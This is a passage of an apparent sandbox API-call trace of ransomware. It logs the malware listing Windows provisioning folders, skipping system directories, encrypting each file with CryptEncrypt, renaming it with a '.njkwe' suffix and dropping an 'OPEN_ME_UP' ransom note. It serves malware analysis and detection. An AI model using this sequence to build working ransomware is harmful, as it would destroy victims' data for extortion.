pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\*") returned 95 [0075.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a220 [0075.387] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.387] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.388] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.388] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.388] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.388] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\.") returned 95 [0075.388] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.388] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.388] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.388] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.388] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.388] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.388] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.388] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\..") returned 96 [0075.388] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.388] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.388] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53eab83a, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53eab83a, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53eab83a, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x360, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="")) returned 1 [0075.388] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Windows") returned -1 [0075.388] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="$Recycle.bin") returned 1 [0075.388] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="System Volume Information") returned -1 [0075.388] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files") returned -1 [0075.388] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files (x86)") returned -1 [0075.388] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\0__Power_Policy.provxml") returned 117 [0075.388] StrStrIW (lpFirst="0__Power_Policy.provxml", lpSrch=".njkwe") returned 0x0 [0075.388] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.388] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="taridd") returned -1 [0075.388] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\0__Power_Poli", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.388] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\prov\\runtime\\0__power_policy.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0075.389] GetTickCount () returned 0x1153312 [0075.389] GetTickCount () returned 0x1153312 [0075.389] GetTickCount () returned 0x1153312 [0075.389] GetTickCount () returned 0x1153312 [0075.389] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0075.389] GetProcessHeap () returned 0xbe0000 [0075.389] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0075.390] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0x360, lpOverlapped=0x0) returned 1 [0075.392] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.392] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesWritten=0x380edc4*=0x360, lpOverlapped=0x0) returned 1 [0075.392] GetProcessHeap () returned 0xbe0000 [0075.392] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0075.392] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.393] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0075.393] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0075.393] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0075.393] CloseHandle (hObject=0x43c) returned 1 [0075.393] GetProcessHeap () returned 0xbe0000 [0075.393] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0075.393] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe") returned 137 [0075.393] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\prov\\runtime\\0__power_policy.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\prov\\runtime\\0__power_policy.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0075.394] GetProcessHeap () returned 0xbe0000 [0075.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0075.394] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53eab83a, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53eab83a, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53eab83a, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x360, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="")) returned 0 [0075.394] FindClose (in: hFindFile=0xc1a220 | out: hFindFile=0xc1a220) returned 1 [0075.394] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0075.394] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0075.395] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0075.396] CloseHandle (hObject=0x438) returned 1 [0075.396] GetProcessHeap () returned 0xbe0000 [0075.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0075.396] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ed1a9f, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ed1a9f, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ed1a9f, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0xfb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0075.396] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0075.396] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0075.396] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0075.396] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0075.396] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0075.397] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime.xml") returned 97 [0075.397] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0075.397] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.397] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0075.397] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0075.397] GetTickCount () returned 0x1153322 [0075.397] GetTickCount () returned 0x1153322 [0075.397] GetTickCount () returned 0x1153322 [0075.397] GetTickCount () returned 0x1153322 [0075.397] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0075.397] GetProcessHeap () returned 0xbe0000 [0075.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4e850 [0075.398] ReadFile (in: hFile=0x438, lpBuffer=0xc4e850, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesRead=0x380f04c*=0xfb, lpOverlapped=0x0) returned 1 [0075.399] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffff05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.399] WriteFile (in: hFile=0x438, lpBuffer=0xc4e850*, nNumberOfBytesToWrite=0xfb, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesWritten=0x380f04c*=0xfb, lpOverlapped=0x0) returned 1 [0075.399] GetProcessHeap () returned 0xbe0000 [0075.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4e850 | out: hHeap=0xbe0000) returned 1 [0075.399] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.399] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0075.400] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0075.401] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0075.401] CloseHandle (hObject=0x438) returned 1 [0075.401] GetProcessHeap () returned 0xbe0000 [0075.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0075.401] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0075.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.401] GetProcessHeap () returned 0xbe0000 [0075.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0075.401] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ed1a9f, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ed1a9f, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ed1a9f, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0xfb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0075.401] FindClose (in: hFindFile=0xc19ea0 | out: hFindFile=0xc19ea0) returned 1 [0075.401] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0075.401] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.402] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0075.403] CloseHandle (hObject=0x434) returned 1 [0075.403] GetProcessHeap () returned 0xbe0000 [0075.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.403] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0075.403] FindClose (in: hFindFile=0xc19e60 | out: hFindFile=0xc19e60) returned 1 [0075.403] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0075.403] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.405] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0075.406] CloseHandle (hObject=0x430) returned 1 [0075.406] GetProcessHeap () returned 0xbe0000 [0075.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0075.406] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x217b4a1a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x217b4a1a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x217b4a1a, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", cAlternateFileName="{3742E~1")) returned 1 [0075.406] lstrcmpiW (lpString1="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="Windows") returned -1 [0075.406] lstrcmpiW (lpString1="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="$Recycle.bin") returned 1 [0075.406] lstrcmpiW (lpString1="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="System Volume Information") returned -1 [0075.406] lstrcmpiW (lpString1="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="Program Files") returned -1 [0075.406] lstrcmpiW (lpString1="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="Program Files (x86)") returned -1 [0075.406] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}") returned 80 [0075.406] lstrcmpW (lpString1="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2=".") returned 1 [0075.406] lstrcmpW (lpString1="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="..") returned 1 [0075.406] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.406] GetProcessHeap () returned 0xbe0000 [0075.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0075.406] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*") returned 82 [0075.406] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x217b4a1a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x217b4a1a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x217b4a1a, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 [0075.408] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.408] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.408] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.408] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.408] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.408] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\.") returned 82 [0075.408] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.409] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x217b4a1a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x217b4a1a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x217b4a1a, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.409] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.409] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.409] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.409] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.409] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.409] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\..") returned 83 [0075.409] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.409] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.409] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5410e9a1, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x5410e9a1, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x54134c0b, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1144, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0075.409] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0075.409] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0075.409] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0075.409] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0075.409] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0075.409] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml") returned 99 [0075.409] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0075.409] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.409] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0075.409] 